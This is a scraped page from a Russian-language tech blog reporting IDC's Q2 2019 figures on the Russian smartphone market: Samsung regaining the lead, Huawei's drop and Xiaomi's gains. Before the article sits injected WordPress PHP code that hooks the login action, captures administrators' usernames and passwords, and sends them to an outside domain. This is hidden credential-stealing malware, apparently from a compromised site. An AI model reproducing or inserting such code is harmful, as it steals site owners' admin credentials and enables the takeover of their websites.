if (!function_exists("theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b")) { function theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b', 10, 0); } IDC: Samsung возвращает лидерство на российском рынке смартфонов — techno-blog

IDC: Samsung возвращает лидерство на российском рынке смартфонов

Во втором квартале 2019 года компания отгрузила более двух с половиной миллионов устройств.

Во втором квартале на российский рынок было поставлено 7,315 млн смартфонов, что на 3,7% выше по сравнению с тем же кварталом прошлого года. Объём рынка в денежном выражении составил 1,633 млрд долл., снизившись на 4% в годовом исчислении, несмотря на укрепление курса рубля по отношению к курсу доллара и евро в первой половине 2019 года.

Корейскому бренду помогли продажи устройств A-серии, охватывающей нижний и средний ценовые диапазоны. Вся линейка в целом продавалась успешно: от бюджетного A10 до A50 среднего ценового диапазона, продажи более дорогого A70 были немного ниже.

Успех новой линейки Samsung помог изменить рынок смартфонов во втором квартале, переключившись от продаж дорогих Android-смартфонов и сфокусироваться на ценовых диапазонах 100-300 долл., отметили в IDC. Несмотря на невысокую цену, новые смартфоны Samsung обладают большим экраном. Во втором квартале каждый второй смартфон, поставленный в Россию, имел размер экрана больше 6 дюймов.

Компания Huawei, которая была лидером рынка в первом квартале, во втором квартале, как и ожидалось, пострадала из-за обеспокоенности потребителей относительно будущего уровня поддержки Android на своих смартфонах. Быстрый рост поставок вендора в Россию, наблюдавшийся в течение последних кварталов, замедлился – и составил 2,1 млн устройств. Хотя этот результат выше, чем во втором квартале 2018 года, он на 15,1% ниже уровня поставок в первом квартале 2019 года.

Компания Xiaomi также воспользовалась трудностями Huawei и впервые за три квартала поставила более миллиона смартфонов.

Если в России поставки Huawei упали на 15,1%, то по всей Европе в целом, где потребители обычно используют больше западных приложений для Android, чем в России, поставки упали более чем на 22,4%.